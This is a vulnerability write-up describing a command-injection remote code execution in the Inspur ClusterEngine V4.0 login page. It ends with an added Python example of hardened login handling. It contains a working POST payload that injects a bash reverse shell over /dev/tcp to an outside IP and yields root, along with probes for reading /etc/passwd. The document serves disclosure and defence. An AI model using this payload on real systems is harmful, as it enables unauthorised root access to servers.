Inspur ClusterEngineV4.0 Remote Code Execution

0x01 Description

Today, I found an Inspur Server Cluster Management System on our intranet, whose login page looks like this.

It doesn't have a verification code, so I decided to crack a login account.

When the Burp Suite crack finished, I noticed that if the POST data contains ;', the response packet is abnormal.

At this point, I realized that there may be a remote code execution, so I put this packet in Repeater to replay it. I found that if there is a ' in the POST data, the system throws an exception.

When I tested further, I found that if either the username parameter or the password parameter contains ', an exception is thrown.

So I decided to try sending ' ' to see the response packet.

I noticed a grep command error, so the server code may be something like

var1=`grep xxxx`
var2=$(python -c "from crypt import crypt;print crypt('$passwd','$1$$var1')")

So I tried sending -V and --help to see the response packet, and the response packet confirmed my guess.

Try to read /etc/passwd

Try to list the directories

0x02 Pwned

Now I have confirmed that what I found is a remote code execution. After fuzzing, I got the following payloads:

whoami

uname

reverse shell

op=login&username=1 2\',\'1\'\);  `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`

When I send the payload, I get a root shell on my Kali Linux server.
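
A hardened counterpart to the guessed server-side code above, as an added example that is not part of the original write-up or the vendor's code: the login fields are parsed, validated and hashed in-process, so request data never reaches a shell or grep. The `password` parameter name, the `name:salt_hex:hash_hex` record format, the sample account and the use of PBKDF2 in place of crypt are assumptions.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs

# Allowlist: must start with a letter or underscore, so "-V" / "--help" can
# never be read as an option, and no quote, backtick, space or ';' passes.
USERNAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")
DUMMY = (b"\x00" * 16, b"\x00" * 32)  # hashed for unknown users to equalise work

def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 stands in for the crypt() call in the guessed server code.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

def load_users(text: str) -> dict:
    """Parse constructed 'name:salt_hex:hash_hex' records in-process (no grep)."""
    users = {}
    for line in text.splitlines():
        name, salt_hex, hash_hex = line.split(":")
        users[name] = (bytes.fromhex(salt_hex), bytes.fromhex(hash_hex))
    return users

def check_login(body: str, users: dict) -> bool:
    """Check a form-encoded login body; request data never reaches a shell."""
    form = parse_qs(body, keep_blank_values=True)
    username = form.get("username", [""])[0]
    password = form.get("password", [""])[0]  # parameter name is an assumption
    if form.get("op") != ["login"] or not USERNAME_RE.fullmatch(username):
        return False
    salt, expected = users.get(username, DUMMY)
    matches = hmac.compare_digest(hash_password(password, salt), expected)
    return matches and username in users

# Constructed sample store with one account (not from the page).
_SALT = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_USERS = load_users(
    "operator:%s:%s" % (_SALT.hex(), hash_password("S3cure-example", _SALT).hex())
)

if __name__ == "__main__":
    for body in ("op=login&username=operator&password=S3cure-example",
                 "op=login&username=--help&password=x",
                 "op=login&username=operator'&password=%60id%60"):
        print(body, "->", check_login(body, SAMPLE_USERS))
```

The password is never interpolated into a command or interpreter string, so quotes and backticks in it are just bytes to be hashed.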
